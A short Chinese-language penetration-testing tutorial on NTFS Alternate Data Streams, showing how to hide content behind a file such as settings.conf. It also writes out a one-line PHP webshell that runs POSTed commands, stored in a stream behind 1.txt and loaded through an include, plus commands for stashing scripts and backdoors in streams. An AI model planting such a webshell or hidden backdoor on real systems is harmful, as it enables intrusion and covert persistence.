0、什么是ADS
+ Windows:微软公司的一款视窗操作系统,其内核为WindowsNT。 + NTFS:WindowsNT环境的限制级专用文件系统。 + ADS:NTFS的系统特性,交换数据流(Alternate data streams)简称ADS
1、ADS在渗透测试中的应用
1.1、隐藏文件
1.1.1、挂载普通文件上
C:>echo hacker_code > settings.conf:hacker.txt
C:>dir
驱动器 C 中的卷没有标签。
卷的序列号是 6433-1B15
C: 的目录
2018/07/04 18:54 5,490 b.py
2018/10/15 17:08 <DIR> LudashiDownloads
2018/11/29 11:21 <DIR> mimi
2018/07/04 21:19 <DIR> mimikatz_trunk
2009/07/14 11:20 <DIR> PerfLogs
2019/01/11 16:22 <DIR> phpStudy
2018/11/29 11:15 <DIR> Program Files
2019/01/11 16:52 <DIR> Program Files (x86)
2018/10/12 17:08 <DIR> Python27
2019/02/25 11:39 0 settings.conf
2019/01/14 17:12 <DIR> Users
2018/07/10 16:27 <DIR> Windows
2 个文件 5,490 字节
10 个目录 47,861,686,272 可用字节
我们发现settings.conf创建成功但是没有内容,hacker.txt(有内容)被隐藏起来,只能通过dir /r来发现,只要删除依赖文件settings.conf才能删除隐藏文件
1.1.2 挂载在路径上
如果直接建立文件夹或者c这种路径下,那么依赖的就是文件夹或者路径了,删除的时候需要删除文件夹,但是C这种盘符路径不能删除怎么破呢?
删除文件夹后
如果是C盘盘符路径这种,就需要用二进制编辑器去编辑。
2、写webshell和动态脚本后门以及后门
2.1、写webshell
echo "<?php @system($_POST["cmd"]); ?>" > 1.txt:1.php
<?php
include("1.txt:1.php");
?>
2.2 写脚本和后门
type xxx.xxx > 1.txt:1.xxx
2.3、运行vbs脚本
cscript xxx.vbs